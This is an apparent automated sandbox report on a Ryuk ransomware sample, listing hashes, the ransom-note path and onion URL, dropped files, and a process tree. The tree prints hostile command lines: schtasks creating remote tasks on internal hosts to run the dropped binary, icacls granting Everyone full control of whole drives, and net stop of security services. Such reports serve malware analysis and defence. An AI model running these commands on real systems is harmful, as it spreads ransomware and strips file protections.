Analysis
max time kernel: 113s
max time network: 142s
platform: windows10_x64
resource: win10v20201028
submitted: 23/03/2021, 15:25
Tasks
Static task: static1
Behavioral task: behavioral1 (Sample: xxx.exe, Resource: win7v20201028)
Behavioral task: behavioral2 (Sample: xxx.exe, Resource: win10v20201028)
General
Target: xxx.exe
Size: 208KB
MD5: 3c08d1e5233c623bfc854879173544de
SHA1: a1add1d1e80d84440fc013abcc754f1bdddf3a20
SHA256: 956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5
SHA512: 01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943
Malware Config
Extracted
Path: C:\users\Public\RyukReadMe.html
Family: ryuk
URL: http://lgjpuim5fe3pejmllygcffape3djui6k2a5pcbpuyvps3h4ajb7yf4id.onion
Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.

Executes dropped EXE (3 IoCs)
pid   Process
2000  wtLIEtzKGrep.exe
652   gWqMBNtPvlan.exe
2608  ScKDbDhotlan.exe

Modifies file permissions (1 TTPs, 2 IoCs)
pid   Process
4444  icacls.exe
4456  icacls.exe

Drops desktop.ini file(s) (1 IoCs)
description  ioc  Process
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI  xxx.exe
Drops file in Program Files directory (64 IoCs)
description: File opened for modification (every entry)
Process: xxx.exe (every entry)
ioc:
C:\Program Files\Java\jre1.8.0_66\lib\ext\access-bridge-64.jar
C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar
C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt
C:\Program Files\Microsoft Office\root\Templates\1033\LoanAmortization.xltx
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\RyukReadMe.html
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\css\RyukReadMe.html
C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc
C:\Program Files\VideoLAN\VLC\lua\meta\art\RyukReadMe.html
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml
C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms
C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sql90.xsl
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js
C:\Program Files\Common Files\microsoft shared\ink\en-US\mip.exe.mui
C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms
C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar
C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-oob.xrm-ms
C:\Program Files\Microsoft Office\root\Office16\MSIPC\es\RyukReadMe.html
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODDBS.DLL
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RyukReadMe.html
C:\Program Files\Common Files\microsoft shared\ink\et-EE\RyukReadMe.html
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar
C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml
C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ppd.xrm-ms
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RyukReadMe.html
C:\Program Files\7-Zip\Lang\io.txt
C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML
C:\Program Files\Microsoft Office\root\Templates\1033\RedAndBlackReport.dotx
C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BOOKOS.TTF
C:\Program Files\Microsoft Office\root\Office16\Graph.exe.manifest
C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]
C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.EXCEL.16.1033.hxn
C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-awt.xml
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
C:\Program Files\VideoLAN\VLC\plugins\access_output\RyukReadMe.html
C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\RyukReadMe.html
C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_duplicate_18.svg
C:\Program Files\Java\jre1.8.0_66\lib\deploy\splash.gif
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_col.hxc
C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_COL.HXC
C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms
C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-ul-oob.xrm-ms
C:\Program Files\7-Zip\Lang\mn.txt
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar
C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2XML.XSL
C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.POWERPNT.16.1033.hxn
C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\PlayStore_icon.svg
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties
C:\Program Files\Microsoft Office\root\Integration\C2RIntLoc.en-us.16.msi
C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms
C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\RyukReadMe.html
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\RyukReadMe.html
C:\Program Files\7-Zip\Lang\de.txt
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\RyukReadMe.html
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\RyukReadMe.html
C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 12 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
4748  schtasks.exe
1448  schtasks.exe
2156  schtasks.exe
5088  schtasks.exe
1768  schtasks.exe
4524  schtasks.exe
4656  schtasks.exe
4732  schtasks.exe
4432  schtasks.exe
4668  schtasks.exe
4864  schtasks.exe
1764  schtasks.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid  Process
644  xxx.exe
644  xxx.exe
644  xxx.exe
644  xxx.exe

Suspicious use of WriteProcessMemory (39 IoCs)
description                        pid   Process  procid_target
PID 644 wrote to memory of 2000    644   xxx.exe  78
PID 644 wrote to memory of 2000    644   xxx.exe  78
PID 644 wrote to memory of 2000    644   xxx.exe  78
PID 644 wrote to memory of 652     644   xxx.exe  79
PID 644 wrote to memory of 652     644   xxx.exe  79
PID 644 wrote to memory of 652     644   xxx.exe  79
PID 644 wrote to memory of 2608    644   xxx.exe  80
PID 644 wrote to memory of 2608    644   xxx.exe  80
PID 644 wrote to memory of 2608    644   xxx.exe  80
PID 644 wrote to memory of 4444    644   xxx.exe  81
PID 644 wrote to memory of 4444    644   xxx.exe  81
PID 644 wrote to memory of 4444    644   xxx.exe  81
PID 644 wrote to memory of 4456    644   xxx.exe  83
PID 644 wrote to memory of 4456    644   xxx.exe  83
PID 644 wrote to memory of 4456    644   xxx.exe  83
PID 644 wrote to memory of 4852    644   xxx.exe  85
PID 644 wrote to memory of 4852    644   xxx.exe  85
PID 644 wrote to memory of 4852    644   xxx.exe  85
PID 644 wrote to memory of 4796    644   xxx.exe  87
PID 644 wrote to memory of 4796    644   xxx.exe  87
PID 644 wrote to memory of 4796    644   xxx.exe  87
PID 644 wrote to memory of 4884    644   xxx.exe  89
PID 644 wrote to memory of 4884    644   xxx.exe  89
PID 644 wrote to memory of 4884    644   xxx.exe  89
PID 4852 wrote to memory of 4844   4852  net.exe  91
PID 4852 wrote to memory of 4844   4852  net.exe  91
PID 4852 wrote to memory of 4844   4852  net.exe  91
PID 644 wrote to memory of 4944    644   xxx.exe  92
PID 644 wrote to memory of 4944    644   xxx.exe  92
PID 644 wrote to memory of 4944    644   xxx.exe  92
PID 4796 wrote to memory of 5056   4796  net.exe  94
PID 4796 wrote to memory of 5056   4796  net.exe  94
PID 4796 wrote to memory of 5056   4796  net.exe  94
PID 4884 wrote to memory of 4484   4884  net.exe  95
PID 4884 wrote to memory of 4484   4884  net.exe  95
PID 4884 wrote to memory of 4484   4884  net.exe  95
PID 4944 wrote to memory of 4792   4944  net.exe  96
PID 4944 wrote to memory of 4792   4944  net.exe  96
PID 4944 wrote to memory of 4792   4944  net.exe  96
Processes
(Each entry lists the image path, the command line, the PID and the matched signatures; indentation shows the parent/child relationship.)

C:\Users\Admin\AppData\Local\Temp\xxx.exe
  "C:\Users\Admin\AppData\Local\Temp\xxx.exe"
  PID: 644
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe
    "C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe" 9 REP
    PID: 2000
    - Executes dropped EXE

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.73 /TN VhdJgMX /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4656
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.82 /TN TGctyK5 /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4748
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.77 /TN 5EFJcFL /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4732
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.72 /TN p33jl25 /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4432
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.95 /TN jzKupPi /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4668
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.86 /TN qxhyim9 /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 1448
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.81 /TN sGCrDdL /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 2156
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.70 /TN AbdzP7q /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 5088
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.88 /TN 0LDjBLF /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 1768
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.66 /TN eMHGKXY /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4864
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.74 /TN lWGEEzd /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 4524
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.71 /TN JceVIbO /TR "C:\Users\Public\wtLIEtzKGrep.exe" /sc once /st 00:00 /RL HIGHEST
      PID: 1764
      - Creates scheduled task(s)

  C:\Users\Admin\AppData\Local\Temp\gWqMBNtPvlan.exe
    "C:\Users\Admin\AppData\Local\Temp\gWqMBNtPvlan.exe" 8 LAN
    PID: 652
    - Executes dropped EXE

  C:\Users\Admin\AppData\Local\Temp\ScKDbDhotlan.exe
    "C:\Users\Admin\AppData\Local\Temp\ScKDbDhotlan.exe" 8 LAN
    PID: 2608
    - Executes dropped EXE

  C:\Windows\SysWOW64\icacls.exe
    icacls "C:\*" /grant Everyone:F /T /C /Q
    PID: 4444
    - Modifies file permissions

  C:\Windows\SysWOW64\icacls.exe
    icacls "D:\*" /grant Everyone:F /T /C /Q
    PID: 4456
    - Modifies file permissions

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
    PID: 4852
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "audioendpointbuilder" /y
      PID: 4844

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\System32\net.exe" stop "samss" /y
    PID: 4796
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "samss" /y
      PID: 5056

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
    PID: 4884
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "audioendpointbuilder" /y
      PID: 4484

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\System32\net.exe" stop "samss" /y
    PID: 4944
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "samss" /y
      PID: 4792